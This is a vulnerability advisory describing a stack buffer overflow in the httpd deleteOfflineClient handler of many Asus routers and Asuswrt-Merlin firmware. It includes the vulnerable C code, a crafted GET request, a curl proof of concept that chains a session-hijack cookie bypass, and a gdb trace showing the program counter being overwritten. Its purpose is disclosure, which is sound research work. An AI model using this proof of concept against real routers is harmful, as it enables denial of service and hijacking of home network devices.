## [Vulnerability]: ##
Stack buffer overflow in httpd
------------------------------------------
## [Exploitation]: ##
Can control the $pc.
Use together with a session hijack vulnerability or in a csrf attack,
can remote code execution and then get a connectback shell.
------------------------------------------
## [Vendor of Product]: ##
Asus wireless router
------------------------------------------
## [Affected Products and firmware version]: ##
Asuswrt-Merlin ,all the firmware and the latest firmware is 380.67_0
RT-AC5300 ,all the firmware,include the last and before.
RT_AC1900P ,all the firmware,include the last and before.
RT-AC68U ,all the firmware,include the last and before.
RT-AC68P ,all the firmware,include the last and before.
RT-AC88U ,all the firmware,include the last and before.
RT-AC66U ,all the firmware,include the last and before.
RT-AC66U_B1 ,all the firmware,include the last and before.
RT-AC58U ,all the firmware,include the last and before.
RT-AC56U ,all the firmware,include the last and before.
RT-AC55U ,all the firmware,include the last and before.
RT-AC52U ,all the firmware,include the last and before.
RT-AC51U ,all the firmware,include the last and before.
RT-N18U ,all the firmware,include the last and before.
RT-N66U ,all the firmware,include the last and before.
RT-N56U ,all the firmware,include the last and before.
RT-AC3200 ,all the firmware,include the last and before.
RT-AC3100 ,all the firmware,include the last and before.
RT_AC1200GU ,all the firmware,include the last and before.
RT_AC1200G ,all the firmware,include the last and before.
RT-AC1200 ,all the firmware,include the last and before.
RT-AC53 ,all the firmware,include the last and before.
RT-N12HP ,all the firmware,include the last and before.
RT-N12HP_B1 ,all the firmware,include the last and before.
RT-N12D1 ,all the firmware,include the last and before.
RT-N12+ ,all the firmware,include the last and before.
RT_N12+_PRO ,all the firmware,include the last and before.
RT-N16 ,all the firmware,include the last and before.
RT-N300 ,all the firmware,include the last and before.
------------------------------------------
## [Attack Type]: ##
Remote
------------------------------------------
## [Can Cause Denial of Service?]: ##
yes
------------------------------------------
## [Reference]: ##
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (chose the others can download the firmware sourcecode)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
## [Discoverer]: ##
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
## [Affected components]: ##
Affected executable application: httpd
Affected source code file: \release\src\router\httpd\web.c
Affected function: deleteOfflineClient(webs_t wp, char_t
*urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
------------------------------------------
## [Vulnerability details]: ##
When accessing the deleteOfflineClient.cgi of the web manager(httpd),the httpd will call the function deleteOfflineClient()
to parses the url which in http GET request,and it will use function websGetVar() to get the value of the parameter delete_offline_client
in the url. but, when saving the delete_offline_client to the stack buffer char mac_str[13],it doesn't limit the the length of the parameter
delete_offline_client,so the stack buffer mac_str[13] will be overflow and this stack-based overflow can be used to gain control over
httpd's control flow by overwriting the saved $ra stored on the stack.
deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
{
char *mac = NULL;
char mac_str[13];
mac = websGetVar(wp, "delete_offline_client","");
......
......
i = 0;
while(*mac) {
if(*mac==':') {
mac++;
continue;
}
else {
mac_str[i] = tolower(*mac);
i++;
mac++;
}
}
if(i!=12)
return;
......
}
------------------------------------------
## [Exploitation details]: ##
Because access to the deleteOfflineClient.cgi page requires web authentication,so it needs a session hijack vulnerability or a
csrf attack to get access permissions for the deleteOfflineClient.cgi at first. And then, we can use this vulnerability to control
the httpd's control flow $pc by overwriting the saved $ra stored on the stack.
For example, we can send a http get request like:
`GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1`
And the httpd's control flow $pc will be set to 0x00333333.
------------------------------------------
## [POC]: ##
# Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479)
# With the help of CVE-2017-6549(Session hijack), this POC can exploit this vulnerability to control the $pc
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3
------------------------------------------
[Gdb trace]:
admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd)
dlopen failed on 'libthread_db.so.1' - File not found
GDB will not be able to debug pthreads.
GNU gdb 6.8
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "mipsel-linux"...
I'm sorry, Dave, I can't do that. Symbol format `elf32-tradlittlemips' unknown.
Attaching to program: /usr/sbin/httpd, process 651
0x2ad8d05c in ?? () from /lib/libc.so.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00333333 in ?? ()
(gdb) i r
zero at v0 v1 a0 a1 a2 a3
R0 00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff
t0 t1 t2 t3 t4 t5 t6 t7
R8 2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67
s0 s1 s2 s3 s4 s5 s6 s7
R16 61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158
t8 t9 k0 k1 gp sp s8 ra
R24 00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333
status lo hi badvaddr cause pc
01009c13 11288d57 00000001 00333332 00000008 00333333
fcsr fir restart
00800000 00000000 00000000
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
As we have seen, the registers ra and pc are overwritten by 0x00333333.
Finally, with the ROP can lead to Remote Command Execution.
暂无评论